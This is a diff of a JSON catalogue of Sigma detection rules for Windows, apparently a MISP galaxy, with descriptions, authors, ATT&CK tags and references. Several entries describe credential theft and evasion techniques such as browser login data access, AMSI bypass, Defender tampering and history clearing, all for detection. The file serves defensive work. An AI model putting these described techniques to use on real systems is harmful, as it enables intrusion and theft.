information to determine which users have elevated permissions, such as domain administrators.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_pm_susp_ad_group_reco.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "value": "AD Groups Or Users Enumeration Using PowerShell - PoshModule" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "38a7625e-b2cb-485d-b83d-aff137d859f4", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell download 
command", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/05", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "filename": "posh_pm_susp_download.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "de41232e-12e8-49fa-86bc-c05c7e722df9", - "value": "Suspicious PowerShell Download - PowerShell Module" - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/10", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_get_nettcpconnection.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ] - }, - "uuid": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", - "value": "Use Get-NetTCPConnection - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule)", - "creation_date": "2017/03/12", - "falsepositive": [ - "Very special / sneaky PowerShell scripts" - ], - "filename": "posh_pm_susp_invocation_generic.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "value": "Suspicious PowerShell Invocations - Generic - PowerShell Module" - }, - { - "description": "Detects suspicious PowerShell invocation command parameters", - "meta": { - "author": "Florian Roth (rule), Jonhnathan Ribeiro", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_pm_susp_invocation_specific.yml", - "level": "high", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "value": "Suspicious PowerShell Invocations - Specific - PowerShell Module" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_pm_susp_local_group_reco.yml", - "level": "low", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml" - ], - "tags": [ - 
"attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "value": "Suspicious Get Local Groups Information" - }, - { - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/02/21", - "falsepositive": [ - "Administrator PowerShell scripts" - ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" + "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" ], "tags": [ "attack.initial_access", - "attack.t1078" + "attack.t1189" ] }, - "uuid": "e3818659-5016-4811-a73c-dde4679169d2", - "value": "Suspicious Computer Machine Password by PowerShell" + "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", + "value": "Possible DNS Rebinding" }, { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "description": 
"Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", "meta": { - "author": "frack113", - "creation_date": "2021/12/15", + "author": "Brandon George (blog post), Thomas Patzke (rule)", + "creation_date": "2021/07/08", "falsepositive": [ - "Administrator script" + "Legitimate usage of ip lookup services such as ipify API" ], - "filename": "posh_pm_susp_smb_share_reco.yml", - "level": "low", - "logsource.category": "ps_module", + "filename": "dns_query_win_susp_ipify.yml", + "level": "medium", + "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml" + "https://twitter.com/neonprimetime/status/1436376497980428318", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" ], "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.reconnaissance", + "attack.t1590" ] }, - "uuid": "6942bd25-5970-40ab-af49-944247103358", - "value": "Suspicious Get Information for SMB Share - PowerShell Module" + "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "value": "Suspicious DNS Query for IP Lookup Service APIs" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "posh_pm_susp_zip_compress.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - 
"refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "daf7eb81-35fd-410d-9d7a-657837e602bb", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module" - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", - "creation_date": "2020/10/05", - "falsepositive": [ - "App-V clients" - ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml", - "level": "medium", - "logsource.category": "ps_module", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", - "value": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module" - }, - { - "description": "Detecting use WinAPI Functions in PowerShell", - "meta": { - "author": "Nikita Nazarov, oscd.community, Tim Shelton", - "creation_date": "2020/10/06", - "falsepositive": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" - ], - "filename": "posh_ps_accessing_win_api.yml", + "filename": "proc_creation_win_wmic_tamper_defender.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" - ] - }, - "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", - "value": "Accessing WinAPI in PowerShell" - }, - { - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_access_to_browser_login_data.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_tamper_defender.yml" ], "tags": [ "attack.credential_access", - "attack.t1555.003" + "attack.t1546.008" ] }, - "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", - "value": "Access to Browser Login Data" + "uuid": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "value": "WMIC Tamper Windows Defender" }, { - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will 
bypass the default DNS server and uses a specified server for answering the query.\n", - "meta": { - "author": "Borna Talebi", - "creation_date": "2021/09/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_add_dnsclient_rule.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/NathanMcNulty/status/1569497348841287681", - "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ] - }, - "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", - "value": "Powershell Add Name Resolution Policy Table Rule" - }, - { - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/07/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_adrecon_execution.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "value": "PowerShell ADRecon Execution" - }, - { - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files 
from the Internet", "meta": { "author": "Florian Roth", - "creation_date": "2022/11/09", + "creation_date": "2022/01/11", "falsepositive": [ - "Unknown" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml", + "filename": "proc_creation_win_msedge_minimized_download.yml", "level": "high", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ] - }, - "uuid": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "value": "AMSI Bypass Pattern Assembly GetType" - }, - { - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "meta": { - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "creation_date": "2019/11/01", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_apt_silence_eda.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - 
"attack.g0091", - "attack.s0363" + "attack.t1105" ] }, - "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "value": "Silence.EDA Detection" + "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", + "value": "Suspicious Minimized MSEdge Start" }, { - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", + "description": "Performs execution of specified file, can be used for defensive evasion.", "meta": { "author": "frack113", - "creation_date": "2022/03/17", + "creation_date": "2021/11/24", "falsepositive": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "filename": "posh_ps_as_rep_roasting.yml", + "filename": "proc_creation_win_lolbin_bash.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", - "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "value": "Get-ADUser Enumeration Using UserAccountControl Flags" - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_automated_collection.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ] - }, - "uuid": "c1dda054-d638-4c16-afc8-53e007f3fbc5", - "value": "Automated Collection Command PowerShell" - }, - { - "description": "Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound", - "meta": { - "author": "Austin Songer (@austinsonger)", - "creation_date": "2021/10/23", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_azurehound_commands.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_azurehound_commands.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069" - ] - }, - "uuid": "83083ac6-1816-4e76-97d7-59af9a9ae46e", - "value": "AzureHound PowerShell Commands" - }, - { - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_capture_screenshots.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", - "value": "Windows Screen Capture with CopyFromScreen" - }, - { - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_clearing_windows_console_history.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", - "https://www.shellhacks.com/clear-history-powershell/", - "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" - ] - }, - "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "value": "Clearing Windows Console History" - }, - { - "description": "Detects keywords that could indicate clearing PowerShell history", - "meta": { - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2022/01/25", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_clear_powershell_history.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.003" - ] - }, - "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", - "value": "Clear PowerShell History - PowerShell" - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_invocation_lolscript.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "value": "Execution via CL_Invocation.ps1 - Powershell" - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_invocation_lolscript_count.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", - "value": "Execution via CL_Invocation.ps1 (2 
Lines)" - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "value": "Execution via CL_Mutexverifiers.ps1" - }, - { - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://twitter.com/pabraeken/status/995111125447577600", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", - "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" - }, - { - "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": 
"posh_ps_cmdlet_scheduled_task.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", - "value": "Powershell Create Scheduled Task" - }, - { - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/17", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "db885529-903f-4c5d-9864-28fe199e6370", - 
"value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" - }, - { - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2021/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_copy_item_system_directory.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ] - }, - "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "value": "Powershell Install a DLL in System Directory" - }, - { - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_cor_profiler.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.012" - ] - }, - "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", - "value": "Registry-Free Process Scope COR_PROFILER" - }, - { - "description": "Detects creation of a local user via PowerShell", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/04/11", - "falsepositive": [ - "Legitimate user creation" - ], - "filename": "posh_ps_create_local_user.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.persistence", - "attack.t1136.001" - ] - }, - "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "value": "PowerShell Create Local User" - }, - { - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain 